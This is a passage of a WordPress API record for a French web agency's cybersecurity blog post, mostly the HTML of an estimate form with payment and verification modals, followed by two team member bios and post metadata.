data-backdrop=\"\"><div class=\"modal-dialog\"><div class=\"modal-content\"><div class=\"modal-header\"><span class=\"fas fa-lock\"><\/span><span>Envoyez-moi mon mot de passe<\/span><a href=\"javascript:\" class=\"close\" data-bs-dismiss=\"modal\" aria-label=\"Close\"><span class=\"fas fa-times\"><\/span><\/a><\/div> <div class=\"modal-body p-0\">Votre mot de passe a \u00e9t\u00e9 envoy\u00e9 par email<\/div><div class=\"modal-footer\"><a href=\"javascript:\"  data-bs-dismiss=\"modal\" class=\"btn btn-primary btn-circle\"><span class=\"fas fa-check\"><\/span><\/a><\/div><\/div><\/div><\/div><div id=\"lfb_stripeModal\" class=\"modal\" data-backdrop=\"\"><div class=\"modal-dialog\"><div class=\"modal-content\"><div class=\"modal-header\"><div><span class=\"fab fa-cc-stripe\"><\/span><span>Make a payment<\/span><\/div><a href=\"javascript:\" class=\"close\" data-bs-dismiss=\"modal\" aria-label=\"Close\"><span class=\"fas fa-times\"><\/span><\/a><\/div> <div class=\"modal-body p-0\"><div data-panel=\"form\" class=\"p-2\"><div class=\"lfb_amountTextContainer\" class=\"p-2 mb-3 \"><div class=\"m-0 lfb_amountText text-center pb-2\">Total to pay :<br\/> <strong data-info=\"amount\">$5<\/strong><\/div><\/div><form method=\"post\" id=\"lfb_stripePaymentForm\" class=\"pl-4 pr-4 pt-3\" ><div class=\"row\"><div class=\"form-group col-md-6\"><div id=\"lfb_stripe_card-element\" class=\"form-control\"><\/div><\/div><div class=\"form-group col-md-3\"><div id=\"lfb_stripe_expiration-element\" class=\"form-control\"><\/div><\/div><div class=\"form-group col-md-3\"><div id=\"lfb_stripe_cvc-element\" class=\"form-control\"><\/div><\/div><div id=\"lfb_stripe_card-error\" class=\" col-md-12\"><\/div><div class=\"form-group col-md-12\"><input placeholder=\"Card owner name\" name=\"ownerName\" class=\"form-control\" type=\"text\"\/><\/div><\/div><\/form><div class=\"text-center lfb_stripeLogoContainer\"><img decoding=\"async\" class=\"lfb_stripeLogo\" src=\"https:\/\/acinonyxweb.agency\/wp-content\/plugins\/WP_Estimation_Form\/assets\/img\/powered_by_stripe@2x.png\" alt=\"Powered by Stripe\" \/><\/div><\/div><div data-panel=\"loading\"><div class=\" text-center\"><span class=\"fas fa-hourglass-half big\"><\/span><\/div><\/div><div data-panel=\"fail\"><div class=\"text-center\"><p><span class=\"fas fa-times big\"><\/span><\/p><div>Payment could not be made<\/div><div data-info=\"error\" class=\"text-center\"><\/div><\/div><\/div><\/div><div class=\"modal-footer\"><a href=\"javascript:\" data-action=\"pay\"  class=\"btn btn-primary\"><span class=\"fas fa-check\"><\/span>Pay now<\/a><\/div><\/div><\/div><\/div><div id=\"lfb_verificationModal\" class=\"modal\" data-backdrop=\"\"><div class=\"modal-dialog\"><div class=\"modal-content\"><div class=\"modal-body\"><div class=\"form-group\"><label>Fill the code you received by email<\/label><div class=\"lfb_verification-code-inputs\"><input type=\"text\" class=\"form-control lfb_verification-char\" maxlength=\"1\" name=\"verificationCode[]\" \/><input type=\"text\" class=\"form-control lfb_verification-char\" maxlength=\"1\" name=\"verificationCode[]\" \/><input type=\"text\" class=\"form-control lfb_verification-char\" maxlength=\"1\" name=\"verificationCode[]\" \/><input type=\"text\" class=\"form-control lfb_verification-char\" maxlength=\"1\" name=\"verificationCode[]\" \/><input type=\"text\" class=\"form-control lfb_verification-char\" maxlength=\"1\" name=\"verificationCode[]\" \/><input type=\"text\" class=\"form-control lfb_verification-char\" maxlength=\"1\" name=\"verificationCode[]\" \/><\/div><\/div><\/div><\/div><\/div><\/div><div class=\"lfb_floatingSummaryBtnCtWrapper\"><div class=\"lfb_floatingSummaryBtnCt\"><a href=\"javascript:\" data-defaulttext=\"\" data-deltext=\"Delete backup\"  data-originalicon=\"fas fa-save\" class=\"lfb_btnSaveForm btn btn-default btn-circle \"><span class=\"fas fa-save\"><\/span><span><\/span><\/a><\/div><\/div><a id=\"lfb_close_btn\" href=\"javascript:\"><span class=\"fas fa-times\"><\/span><\/a>\n                <div id=\"lfb_panel\">\n                <div class=\"container-fluid\">\n                    <div class=\"row\">\n                        <div class=\"\" ><div id=\"startInfos\" class=\"\"><p class=\"lfb_textCenter\"><img decoding=\"async\" src=\"https:\/\/acinonyxweb.agency\/wp-content\/uploads\/2020\/06\/logocdc.png\" id=\"lfb_introImage\" alt=\"Sp\u00e9cifications de votre projet\" \/><\/p><h2 id=\"lfb_mainFormTitle\">Sp\u00e9cifications de votre projet<\/h2>\n                        <p>Suivez les diff\u00e9rentes \u00e9tapes pour g\u00e9n\u00e9rer les sp\u00e9cifications de votre projet<\/p>\n                            <\/div><p class=\"lfb_startBtnContainer \">\n                                <a href=\"javascript:\"  class=\"btn btn-large btn-primary\" id=\"lfb_btnStart\"><span class=\"fa fa-thumbs-up\"><\/span>C'EST PARTI<\/a>\n                            <\/p><h3 id=\"finalText\" class=\"lfb_stepTitle\">F\u00e9licitations, nous vous avons envoy\u00e9 vos sp\u00e9cifications par e-mail et nous vous r\u00e9pondrons dans les plus brefs d\u00e9lais!<\/h3>\n                        <\/div>\n                        <!-- \/col -->\n                    <\/div>\n                    <!-- \/row -->\n                <div id=\"lfb_mainPanel\" class=\"palette-clouds\" data-savecart=\"0\"> <div id=\"lfb_stepper\"><div id=\"lfb_stepperBar\"><\/div><\/div> <input type=\"hidden\" name=\"action\" value=\"lfb_upload_form\"\/>\n                <input type=\"hidden\" id=\"lfb_formSession\" name=\"formSession\" value=\"6a62ce0bba1dd\"\/><div class=\"lfb_genSlide\" data-start=\"1\"    data-showstepsum=\"1\" data-stepid=\"214\" data-title=\"A propos de votre projet\" data-required=\"true\" data-dependitem=\"0\">\t<h3 class=\"lfb_stepTitle\">A propos de votre projet<\/h3>\t<p class=\"lfb_stepDescription\">Quel est l'objectif de votre projet?<\/p>\t<div class=\"lfb_genContent container \" >\t\t<div class=\"row lfb_row  lfb_sortable\"><div class=\"lfb_itemBloc col-md-2  lfb_item lfb_itemContainer_1159  \" data-alignment=\"0\" data-id=\"1159\" data-itemtype=\"textfield\"><div class=\"form-group\"><label>Quelle est l'URL de votre site Web?<\/label>\n                 <input   data-prefill=\"\" data-urlvariable=\"1\" data-sentattribute=\"quantity\"  data-variablename=\"\"  data-type=\"textfield\" type=\"text\"  data-autocomplete=\"0\" placeholder=\"\" data-fieldtype=\"\"           data-itemid=\"1159\"   data-showinsummary=\"true\"  class=\"form-control\" data-required=\"true\"  data-title=\"Quelle est l'URL de votre site Web?\" data-originaltitle=\"Quelle est l'URL de votre site Web?\"  data-originallabel=\"Quelle est l'URL de votre site Web?\"  \/><\/div><\/div><div class=\"lfb_itemBloc col-md-2  lfb_item lfb_itemContainer_1160  \" data-alignment=\"0\" data-id=\"1160\" data-itemtype=\"textarea\"><div class=\"form-group\"><label>Pouvez-vous nous donner des d\u00e9tails sur vos besoins?<\/label>\n                 <textarea    data-prefill=\"\" data-urlvariable=\"1\" data-sentattribute=\"price\"  data-variablename=\"\" placeholder=\"\"  data-type=\"textarea\" data-itemid=\"1160\"          data-showinsummary=\"true\"  class=\"form-control\" data-required=\"true\" data-title=\"Pouvez-vous nous donner des d\u00e9tails sur vos besoins?\" data-originaltitle=\"Pouvez-vous nous donner des d\u00e9tails sur vos besoins?\"  data-originallabel=\"Pouvez-vous nous donner des d\u00e9tails sur vos besoins?\" ><\/textarea><\/div><\/div> <\/div> <\/div><div class=\"lfb_errorMsg alert alert-danger\">Vous devez s\u00e9lectionner un \u00e9l\u00e9ment pour continuer<\/div><div class=\"text-center lfb_btnNextContainer\"><a href=\"javascript:\" id=\"lfb_btnNext_214\" class=\"btn btn-wide btn-primary lfb_btn-next \"><span class=\"lfb_btnContent\"><span class=\"fa fa-check\"><\/span>Prochain<\/span><\/a><\/div><\/div><div class=\"lfb_genSlide\" id=\"finalSlide\" data-stepid=\"final\" data-title=\"Vos sp\u00e9cifications ont \u00e9t\u00e9 g\u00e9n\u00e9r\u00e9es\">\n                <h3 class=\"lfb_stepTitle\">Vos sp\u00e9cifications ont \u00e9t\u00e9 g\u00e9n\u00e9r\u00e9es<\/h3>\n                <div class=\"lfb_genContent container\">\n                    <div class=\"row lfb_row lfb_genContentSlide active  lfb_sortable\">\n                        <p id=\"lfb_finalLabel\" class=\"lfb-hidden\">Votre projet devrait:<\/p><div id=\"lfb_finalPrice\" class=\"lfb-hidden\"><span><\/span><\/div><div id=\"lfb_subTxtValue\" class=\"lfb_dynamicHide\"><\/div><div class=\"lfb_itemBloc lfb_richtext  col-md-12  lfb_item lfb_itemContainer_1161  \"   data-id=\"1161\" data-itemtype=\"richtext\" data-itemid=\"1161\" data-title=\" \"    ><div class=\"lfb_richTextContent\"><div style=\"text-align: center;\">But by using this simulator you gain 10% reduction with the code CHEETAH10!<\/div><\/div><\/div><div class=\"lfb_itemBloc col-md-12  lfb_item lfb_itemContainer_1163  \" data-alignment=\"0\" data-id=\"1163\" data-itemtype=\"textfield\"><div class=\"form-group\"><label>To which email should we send the generated specifications?<\/label>\n                 <input   data-prefill=\"\" data-urlvariable=\"1\" data-sentattribute=\"quantity\"  data-variablename=\"\"  data-type=\"textfield\" type=\"text\"  data-autocomplete=\"0\" placeholder=\"your@mail.com\" data-fieldtype=\"email\"       autocomplete=\"on\" name=\"email\"     data-itemid=\"1163\"   data-showinsummary=\"true\"  class=\"form-control\" data-required=\"true\"  data-title=\"To which email should we send the generated specifications?\" data-originaltitle=\"To which email should we send the generated specifications?\"  data-originallabel=\"To which email should we send the generated specifications?\"  \/><\/div><\/div><div class=\"lfb_itemBloc col-md-12  lfb_item lfb_itemContainer_1162  \"  data-id=\"1162\" data-itemtype=\"checkbox\"><div  ><label for=\"cb_1162\">Anything else you would like to tell us? \ud83d\ude42<\/label><br\/><input id=\"cb_1162\" data-urlvariable=\"0\" data-sentattribute=\"price\" data-variablename=\"\" type=\"checkbox\"                      class=\"\"   data-operation=\"+\" data-originaltitle=\"Anything else you would like to tell us? :)\"  data-originallabel=\"Anything else you would like to tell us? :)\"  data-itemid=\"1162\" data-prodid=\"0\"  data-woovar=\"0\" data-eddvar=\"0\"   data-toggle=\"switch\" data-checkboxstyle=\"switch\"  data-price=\"0\"  data-addtototal=\"0\" data-title=\"Anything else you would like to tell us? :)\" \/> <\/div><\/div><div class=\"lfb_itemBloc col-md-2  lfb_item lfb_itemContainer_1164 lfb_disabled \" data-alignment=\"0\" data-id=\"1164\" data-itemtype=\"textarea\"><div class=\"form-group\"><label>Your last word:<\/label>\n                 <textarea    data-prefill=\"\" data-urlvariable=\"1\" data-sentattribute=\"price\"  data-variablename=\"\" placeholder=\"\"  data-type=\"textarea\" data-itemid=\"1164\"  data-useshowconditions=\"true\"      data-showconditions=\"[{\\'interaction\\':\\'0_1162\\',\\'action\\':\\'clicked\\'}]\" data-showconditionsoperator=\"\" data-showinsummary=\"true\"  class=\"form-control\"  data-title=\"Your last word:\" data-originaltitle=\"Your last word:\"  data-originallabel=\"Your last word:\" ><\/textarea><\/div><\/div>\n                   <div id=\"lfb_summary\" class=\"lfb_summary table-responsive lfb-hidden\">\n                        <h3>Summary<\/h3>\n                        <table class=\"table table-bordered\">\n                            <thead>\n                                <th>Description<\/th>\n                                <th class=\"lfb_valueTh\">Information<\/th>\n                                <th class=\"lfb_quantityTh \">Quantit\u00e9<\/th>\n                                <th class=\"lfb_priceTh lfb-hidden lfb_hidePrice\">Prix<\/th>\n                            <\/thead>\n                            <tbody>\n                                <tr id=\"lfb_summaryDiscountTr\" class=\"lfb_static lfb-hidden lfb_hidePrice\"><th colspan=\"3\">Discount :<\/th><th id=\"lfb_summaryDiscount\"><span><\/span><\/th><\/tr>\n                                <tr id=\"lfb_summaryTotalTr\" class=\"lfb_static \"><th colspan=\"3\">Total :<\/th><th id=\"lfb_summaryTotal\"><span><\/span><\/th><\/tr>\n                            <\/tbody>\n                        <\/table>\n                    <\/div><div id=\"lfb_lastStepDown\"><\/div><div class=\"text-center lfb_btnNextContainer\"><a href=\"javascript:\" id=\"lfb_btnOrder\" class=\"btn btn-wide btn-primary\"><span class=\"fa fa-check\"><\/span>Envoyez-le \u00e0 mon adresse e-mail<\/a><br\/><div class=\"lfb_linkPreviousCt\"><a href=\"javascript:\" class=\"linkPrevious\"><span class=\"fa fa-arrow-left me-2\"><\/span>Pr\u00e9c\u00e9dent<\/a><\/div><\/div><div class=\"clearfix\" data-tldinit=\"true\"><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column]<div id=\"awsm-team-897\" class=\"awsm-grid-wrapper\">\n\t\t\n\t\t\t<div class=\"awsm-grid list-style style-1 grid-2-col \">\n\t\t\t\t\t\t<div id=\"awsm-member-897-2106\" class=\"awsm-grid-card awsm-team-item awsm-scale-anm awsm-all\">\n\t\t\t\t   <figure>\n\t\t\t\t\t <img loading=\"lazy\" decoding=\"async\" width=\"380\" height=\"264\" src=\"https:\/\/acinonyxweb.agency\/wp-content\/uploads\/2020\/06\/logo-thomas.jpg\" class=\"attachment-awsm_team size-awsm_team wp-post-image\" alt=\"Logo T\" \/>\t\t\t\t\t\t <figcaption>\n\t\t\t\t\t\t\t<div class=\"awsm-personal-info\"><h3>Thomas<\/h3><span>COO &amp; lead developer<\/span><\/div>\n\t\t\t\t\t\t\t<div class=\"awsm-contact-info\">\n\t\t\t\t\t\t\t\t<p>Titulaire du prix cyberjuriste jeune talent informatique 2019, Thomas est un d\u00e9veloppeur fran\u00e7ais connu pour son travail sur Hootis. Sites web, algorithmes, scripts et d\u00e9veloppement d&#8217;API&#8230;<\/p>\n<blockquote><p>Il n&#8217;y a pas de difficult\u00e9 pour moi, seulement des d\u00e9fis \u00e0 surmonter.<\/p><\/blockquote>\n<p>Rien ne lui fait peur ! Il est en charge des projets les plus ambitieux &amp; difficiles avec une \u00e9quipe multidisciplinaire europ\u00e9enne s\u00e9lectionn\u00e9e parmi les meilleurs.<\/p>\n<div class=\"awsm-social-icons\"><span><a href=\"https:\/\/www.thomasdubrez.fr\/\" target=\"_blank\"><i class=\"awsm-icon-link\" aria-hidden=\"true\"><\/i><\/a><\/span><span><a href=\"https:\/\/www.linkedin.com\/in\/thomasdubrez\/\" target=\"_blank\"><i class=\"awsm-icon-linkedin\" aria-hidden=\"true\"><\/i><\/a><\/span><\/div>\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t\t <\/figcaption>\n\t\t\t\t   <\/figure>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n<div id=\"awsm-team-2088\" class=\"awsm-grid-wrapper\">\n\t\t\n\t\t\t<div class=\"awsm-grid list-style style-1 grid-2-col \">\n\t\t\t\t\t\t<div id=\"awsm-member-2088-2087\" class=\"awsm-grid-card awsm-team-item awsm-scale-anm awsm-all\">\n\t\t\t\t   <figure>\n\t\t\t\t\t <img loading=\"lazy\" decoding=\"async\" width=\"500\" height=\"500\" src=\"https:\/\/acinonyxweb.agency\/wp-content\/uploads\/2020\/07\/ls-500x500.jpg\" class=\"attachment-awsm_team size-awsm_team wp-post-image\" alt=\"\" \/>\t\t\t\t\t\t <figcaption>\n\t\t\t\t\t\t\t<div class=\"awsm-personal-info\"><h3>Lucas Sztandarowski<\/h3><span>Juriste<\/span><\/div>\n\t\t\t\t\t\t\t<div class=\"awsm-contact-info\">\n\t\t\t\t\t\t\t\t<p>Lucas Sztandarowski a une histoire unique. Connu dans le monde de la lutte contre la cybercriminalit\u00e9 pour son livre &#8220;La v\u00e9ritable cybercriminalit\u00e9&#8221; et son blog Cyberd\u00e9fenseur, il a supervis\u00e9 l&#8217;infrastructure informatique du cabinet juridique international Eternos Corporation<strong> tout en exer\u00e7ant en tant que conseiller juridique.<\/strong><\/p>\n<blockquote><p>J&#8217;ai toujours \u00e9t\u00e9 passionn\u00e9 par le web et le d\u00e9veloppement de logiciels. J&#8217;ai donc suivi des formations en d\u00e9veloppement afin d&#8217;acqu\u00e9rir une certaine autonomie dans ce domaine. Mon r\u00eave d&#8217;enfant \u00e9tant de devenir conseiller juridique, j&#8217;ai r\u00e9ussi \u00e0 combiner les deux domaines.<\/p><\/blockquote>\n<p>Gr\u00e2ce \u00e0 une \u00e9tude approfondie de la cybercriminalit\u00e9, <strong>il a r\u00e9ussi \u00e0 acqu\u00e9rir des comp\u00e9tences rares pour contrer cette menace d\u00e9sormais in\u00e9vitable.<\/strong><br \/>\n<strong>Il vous aidera \u00e0 structurer vos strat\u00e9gies juridiques en utilisant les derni\u00e8res technologies num\u00e9riques.<\/strong><\/p>\n<div class=\"awsm-social-icons\"><span><a href=\"https:\/\/www.linkedin.com\/in\/sztandarowski\/\" target=\"_blank\"><i class=\"awsm-icon-linkedin\" aria-hidden=\"true\"><\/i><\/a><\/span><span><a href=\"https:\/\/twitter.com\/lsztandarowski\" target=\"_blank\"><i class=\"awsm-icon-twitter\" aria-hidden=\"true\"><\/i><\/a><\/span><span><a href=\"https:\/\/sztandarowski.cyberdefenseur.com\" target=\"_blank\"><i class=\"awsm-icon-link\" aria-hidden=\"true\"><\/i><\/a><\/span><\/div>\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t\t <\/figcaption>\n\t\t\t\t   <\/figure>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n[\/vc_column][\/vc_row]\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column][vc_column_text]WordPress \u00e9tant le CMS le plus populaire au monde, cela a fait de lui une&#8230;<\/p>\n","protected":false},"author":1,"featured_media":4329,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[92],"tags":[],"class_list":["post-4308","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurite"],"_links":{"self":[{"href":"https:\/\/acinonyxweb.agency\/fr\/wp-json\/wp\/v2\/posts\/4308","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/acinonyxweb.agency\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/acinonyxweb.agency\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/acinonyxweb.agency\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/acinonyxweb.agency\/fr\/wp-json\/wp\/v2\/comments?post=4308"}],"version-history":[{"count":2,"href":"https:\/\/acinonyxweb.agency\/fr\/wp-json\/wp\/v2\/posts\/4308\/revisions"}],"predecessor-version":[{"id":8015,"href":"https:\/\/acinonyxweb.agency\/fr\/wp-json\/wp\/v2\/posts\/4308\/revisions\/8015"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/acinonyxweb.agency\/fr\/wp-json\/wp\/v2\/media\/4329"}],"wp:attachment":[{"href":"https:\/\/acinonyxweb.agency\/fr\/wp-json\/wp\/v2\/media?parent=4308"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/acinonyxweb.agency\/fr\/wp-json\/wp\/v2\/categories?post=4308"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/acinonyxweb.agency\/fr\/wp-json\/wp\/v2\/tags?post=4308"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}